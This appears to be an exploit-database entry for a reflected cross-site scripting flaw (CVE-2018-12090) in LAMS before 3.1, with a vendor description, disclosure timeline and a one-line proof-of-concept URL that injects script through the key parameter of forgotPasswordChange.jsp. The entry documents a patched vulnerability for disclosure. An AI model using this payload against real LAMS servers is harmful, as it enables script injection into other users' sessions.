addac3a875
9 changes to exploits/shellcodes mySCADA myPRO 7 - Hard-Coded Credentials Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload Open-AudIT Community 2.2.6 - Cross-Site Scripting Subrion CMS 4.2.1 - Cross-Site Scripting LAMS < 3.1 - Cross-Site Scripting onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin) CMS ISWEB 3.5.3 - Directory Traversal Monstra 3.0.4 - Cross-Site Scripting
32 lines
No EOL
1.3 KiB
Text
32 lines
No EOL
1.3 KiB
Text
# Exploit Title: LAMS < 3.1 - Cross-Site Scripting
|
|
# Date: 2018-08-05
|
|
# Exploit Author: Nikola Kojic
|
|
# Website: https://ras-it.rs/
|
|
# Vendor Homepage: https://www.lamsfoundation.org/
|
|
# Software Link: https://www.lamsfoundation.org/downloads_home.htm
|
|
# Category: Web Application
|
|
# Platform: Java
|
|
# Version: <= 3.1
|
|
# CVE: 2018-12090
|
|
|
|
# Vendor Description:
|
|
# LAMS is a revolutionary new tool for designing, managing and delivering online collaborative
|
|
# learning activities. It provides teachers with a highly intuitive visual authoring
|
|
# environment for creating sequences of learning activities.
|
|
|
|
# Technical Details and Exploitation:
|
|
# There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows
|
|
# a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET
|
|
# parameter during a forgotPasswordChange.jsp?key= password change.
|
|
|
|
# Proof of Concept:
|
|
http://localhost:8080/lams/forgotPasswordChange.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
|
|
|
|
# Timeline:
|
|
# 2018-06-07: Discovered
|
|
# 2018-06-08: Vendor notified
|
|
# 2018-06-08: Vendor replies
|
|
# 2018-06-11: CVE number requested
|
|
# 2018-06-11: CVE number assigned
|
|
# 2018-06-15: Patch released
|
|
# 2018-08-05: Public disclosure |